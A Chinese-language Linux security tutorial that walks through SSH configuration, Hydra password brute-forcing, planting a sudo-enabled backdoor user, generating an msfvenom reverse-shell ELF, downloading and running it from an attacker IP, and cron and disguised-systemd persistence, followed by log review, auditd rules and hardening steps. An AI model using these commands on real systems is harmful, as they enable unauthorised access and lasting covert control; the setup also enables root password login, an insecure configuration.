Linux网络安全
前言
在网络安全领域,Linux 是服务器攻防的绝对主战场,全球超80%的服务器运行 Linux,掌握 Linux 安全攻防,是网安从业者的核心必备技能。本文基于实战课程,从 Linux 基础、SSH 攻防、木马入侵与权限维持、系统日志排查与安全加固,全流程讲解 Linux 网络安全核心技术,适合零基础入门与实战提升。
一、为什么Linux是网安实战核心?
-
市场占比绝对主导:全球80%以上服务器使用 Linux,攻击面广、实战价值极高
-
攻防场景更真实:企业服务器、云主机均以 Linux 为主,是黑客重点目标
-
安全可控性强:开源、轻量、稳定,适合长期不关机、高并发业务场景
二、Linux基础入门:发行版与核心结构
1. Linux起源与发行版
-
1991年林纳斯·托瓦兹发布开源内核,全球开发者协作完善
-
主流发行版:
-
RedHat系列:RedHat、CentOS(企业服务器首选)
-
Debian系列:Ubuntu、Kali(桌面/网安渗透专用)
-
2. Linux核心目录与操作特点
-
无C/D/E盘概念,一切皆文件
-
常用操作:命令行主导,虚拟机推荐 Ubuntu + Kali 双环境
三、系统服务安全:SSH攻防实战
SSH 是 Linux 远程管理核心协议,也是黑客最常攻击的入口。
1. SSH安装与基础配置
# 切换root sudo su # 安装SSH apt install openssh-server # 编辑配置 nano /etc/ssh/sshd_config # 关键配置 PermitRootLogin yes PasswordAuthentication yes # 重启服务 service ssh restart
2. SSH暴力破解(Hydra)
Kali 自带 Hydra,批量尝试密码字典爆破 SSH:
hydra -l root -P password.txt ssh://目标IP
3. 后门用户植入(权限维持)
# 创建用户并创建家目录 useradd -m test passwd test # 赋予sudo权限 nano /etc/sudoers test ALL=(ALL:ALL) ALL
4. 用户与权限基础
-
UID规则:root=0,系统用户1-999,普通用户≥1000
-
文件权限:r=4 w=2 x=1,
chmod 755为常用权限
四、木马入侵检测:长期控制技术
木马核心:伪装、隐蔽、长期控制,三步完成入侵:生成 → 监听 → 植入。
1. MSF生成Linux木马
msfconsole msfvenom -p linux/x64/shell/reverse_tcp LHOST=攻击机IP LPORT=9999 -f elf -o shell.elf
2. MSF启动监听
use exploit/multi/handler set payload linux/x64/shell/reverse_tcp set lhost 攻击机IP set lport 9999 run
3. 木马植入与执行
# 目标机下载 wget http://攻击机IP/shell.elf -O shell.elf # 加执行权限 chmod +x shell.elf # 运行 ./shell.elf
4. 三种权限维持方式
-
计划任务(Cron)
crontab -l | { cat ; echo "* * * * * sleep 10s ; /root/shell.elf" ; } | crontab -
-
开机启动项:
/etc/init.d/ -
系统服务伪装(最强)
nano /etc/systemd/system/test.service # 配置内容 [Unit] Description=test After=network.target [Service] Type=simple ExecStart=/home/enjoy/shell.elf Restart=always [Install] WantedBy=multi-user.target # 加载并开机自启 systemctl daemon-reload systemctl enable test.service systemctl start test.service
五、安全防护与系统加固
1. 日志排查(服务器监控录像)
-
系统日志:
cat /var/log/syslog -
登录日志:
cat /var/log/auth.log -
筛选SSH日志:
journalctl -u ssh | grep 'Failed password' journalctl -u ssh | grep 'Accepted password'
-
审计工具 auditd:
apt install auditd auditctl -w /usr/sbin/useradd -p x -k useradd_exec ausearch -k useradd_exec
2. 黑客痕迹重点排查
-
账户:
cat /etc/passwd、awk -F: '$3==0{print $1}' /etc/passwd -
进程:
ps -ef、top -
端口:
netstat -ntu、ss -ntap -
计划任务:
crontab -l -
服务:
systemctl list-unit-files --type=service
3. Linux系统加固(必做)
-
账户加固
# 禁止root远程登录 nano /etc/ssh/sshd_config PermitRootLogin no systemctl restart sshd
-
防火墙加固:限制端口与IP访问
-
系统更新
apt update && apt upgrade -y
-
关闭无用服务、严格文件权限
六、总结
Linux 网络安全的核心是攻防对抗:
-
攻击方:找入口 → 拿权限 → 植后门 → 保权限
-
防御方:查日志 → 清痕迹 → 堵漏洞 → 强加固
掌握本文内容,可快速具备 Linux 服务器安全攻防实战能力。
openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构
更多推荐

所有评论(0)